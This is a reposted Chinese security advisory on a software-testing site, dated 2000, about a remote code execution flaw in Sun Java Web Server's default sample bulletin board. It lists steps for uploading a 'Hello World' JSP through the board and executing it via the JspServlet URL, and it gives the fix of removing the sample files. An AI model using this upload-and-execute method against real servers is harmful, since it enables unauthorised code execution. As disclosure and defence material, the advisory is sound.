• 软件测试技术
  • 软件测试博客
  • 软件测试视频
  • 开源软件测试技术
  • 软件测试论坛
  • 软件测试沙龙
  • 软件测试资料下载
  • 软件测试杂志
  • 软件测试人才招聘
    暂时没有公告

字号: 小 中 大 | 推荐给好友 上一篇 | 下一篇

Sun Java Web服务器远程可执行命令漏洞

发布: 2007-7-01 18:47 | 作者: admin | 来源: | 查看: 12次 | 进入软件测试论坛讨论

领测软件测试网 Sun Java Web服务器远程可执行命令漏洞



漏洞发布时间:2000-7-13 17:41:00
漏 洞 描 述:

在Solaris and Windows NT的Sun Java Web Server默认安装设置下。通过公告版的样板程序的漏洞,可以远程执行任意命令。

漏洞测试方法如下:

下面的例子将显示如何上载和执行该代码,而在服务器上显示"Hello World"。

输入下面的JSP代码将打印出"Hello World":

<% String s="Hello World"; %>
<%=s %>

通过下面的公告版连接Post这段代码:

http://jws.site/examples/applications/bboard/bboard_frames.html

检验是否该代码真正的上载了:

http://jws.site/board.html

通过执行下面的连接编译和执行该代码:

http://jws.site/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet/board.html

解 决 方 法:

仔细按照Java Web Server手册中的"How to secure a web site that uses the Java Web Server" 一章进行设置,或者参考下面连接:
http://www.sun.com/software/jwebserver/faq/jwsca-2000-02.html
或者简单的移除默认安装的这些样板文件。





延伸阅读

文章来源于领测软件测试网 https://www.ltesting.net/


关于领测软件测试网 | 领测软件测试网合作伙伴 | 广告服务 | 投稿指南 | 联系我们 | 网站地图 | 友情链接
版权所有(C) 2003-2010 TestAge(领测软件测试网)|领测国际科技(北京)有限公司|软件测试工程师培训网 All Rights Reserved
北京市海淀区中关村南大街9号北京理工科技大厦1402室 京ICP备2023014753号-2
技术支持和业务联系:[email protected] 电话:010-51297073

软件测试 | 领测国际 | ISTQB | ISTQB官网 | TMMi | TMMi认证 | 国际软件测试工程师认证 | 领测软件测试网